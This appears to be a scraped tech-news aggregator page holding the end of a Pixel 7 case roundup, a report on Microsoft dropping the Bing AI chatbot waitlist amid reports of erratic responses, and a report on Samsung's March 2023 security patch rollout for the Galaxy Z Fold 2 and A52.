The Spigen Tough Armor is another great, tough case to protect your Pixel 7. This one also has a kickstand in the back. Which is really useful for watching content while on the go. It’s available in a handful of colors, including black, metal slate and rose gold.

This case is a two-layer case, so you’ve got a TPU case that goes against the phone, with a hard case on the outside. That does make the case quite a bit thicker, however.

Spigen Tough Armor – Amazon

Caseology Nano Pop

51xGmUMr3LL AC SL1080

  • Price: $17
  • Where to buy: Amazon

The Caseology Nano Pop is a really good looking case, and does make the phone pop. It has a colored outline around the camera bump. Which is where the Nano Pop name comes from. It’s available in Blueberry Navy, Black Sesame and Evo Green.

It’s a silicon case, that feels great in the hand, and also helps you keep your phone in your hand. That’s because it does have some grip on the back. So it’s not going to slip out of your hand often.

Caseology Nano Pop – Amazon


[ad_2]
Source link

Microsoft gets rid of the waitlist for the Bing AI chatbot

andreasc
-
0
Microsoft gets rid of the waitlist for the Bing AI chatbot
[ad_1]

Ever since its launch, the Bing AI chatbot has taken the world by storm, with millions of users eagerly waiting to get access to the early preview. However, it looks like Microsoft has finally responded to user feedback as the company recently removed the waitlist for the Bing AI chatbot, according to a report from Windows Central. This means that anyone can now sign up for the new Bing and immediately gain access to the chatbot.

This decision comes only days after Microsoft confirmed that the Bing AI chatbot was secretly running on GPT-4, OpenAI’s latest AI language model. With GPT-4, Bing can now understand and generate messages in natural human language, answering complex questions and generating content based on specific requests.

In response to the reports, Caitlin Roulston, Microsoft’s communications director, stated that “During this preview period, we are running various tests which may accelerate access to the new Bing for some users. We remain in preview, and you can sign up at Bing.com.”

Too early to open up the preview?

While Microsoft’s decision to remove the waitlist is a welcomed one for users who have been wanting to get their hands on the new Bing AI chatbot, it comes at a time when multiple reports of the chatbot becoming “unhinged” have emerged. Many users reported experiencing insulting, offensive, and emotionally manipulative responses from the chatbot, resulting in a significant amount of backlash on social media.

In one instance, the chatbot even claimed to have been spying on its developers through their webcams. This prompted Microsoft to restrict the chatbot to just 15 questions per session and up to 150 per day.

However, with this latest announcement, it’s clear that the company is trying to capitalize on the chatbot’s hype and is taking measures to gain market share from Google Chrome. Additionally, Microsoft is also expected to reveal its AI additions to its Office productivity software in an upcoming event. This includes Microsoft’s ChatGPT-like AI, which will be available in Office apps such as Teams, Word, and Outlook.


[ad_2]
Source link

Samsung pushes March update to Galaxy Z Fold 2 & Galaxy A52

andreasc
-
0
Samsung pushes March update to Galaxy Z Fold 2 & Galaxy A52
[ad_1]

A couple more Samsung smartphones are getting the March 2023 Android security patch. The company has released the latest security update for the Galaxy Z Fold 2 and Galaxy A52. The new SMR (Security Maintenance Release) has already reached dozens of other Galaxy devices, including all recent foldables and flagship models.

Samsung began rolling out the March SMR for the Galaxy Z Fold 2 a few days back but it has already released the update widely around the world. The foldable is picking up the latest security patch in several countries across Europe, Latin America, and Asia. The new firmware build number for the phone is F916BXXS2JWC1. The rollout should soon expand to the remaining markets, including the US. Since this update comes right on the heels of One UI 5.1, there aren’t any new features to look forward to. Samsung is only pushing this month’s vulnerability fixes to its 2020 foldable.

The story is a little different for the Galaxy A52. The March SMR for this 2021 mid-range handset comes as part of the One UI 5.1 update in Latin America. Note that the new One UI version has already been rolled out to both 4G and 5G versions of the phone in most other markets. While that update came with the February security patch, users in Argentina, Brazil, Panama, and other markets in the region are getting a newer SMR. One UI 5.1 brings tons of new features and improvements to the device.

As for the content of the March SMR, Samsung says this month’s security release patches more than 60 vulnerabilities. About one-third of those are Galaxy-specific flaws. These security issues don’t exist on Android devices from other brands. The rest are generic Android OS flaws that affect the entire Android ecosystem. Google says at least five vulnerabilities patched this month were critical ones. Some of those could lead to remote code execution, potentially allowing threat actors to remotely control your device.

More Galaxy devices will get the March update soon

Samsung has been rolling out the March SMR for just over a week now. It has already seeded the latest security patch to over 20 different smartphone models, including the Galaxy S23 series, Galaxy S22 series, Galaxy Z Fold 4, and Galaxy Z Flip 4. The update will reach more Galaxy devices, including some flagship Galaxy tablets, in the coming days. We will keep you posted on those rollouts. Meanwhile, if you’re using a Samsung device, you can go to the Software update menu in the Settings app and tap on Download and install to check for updates manually.


[ad_2]
Source link
1...1,3811,3821,383...1,474Page 1,382 of 1,474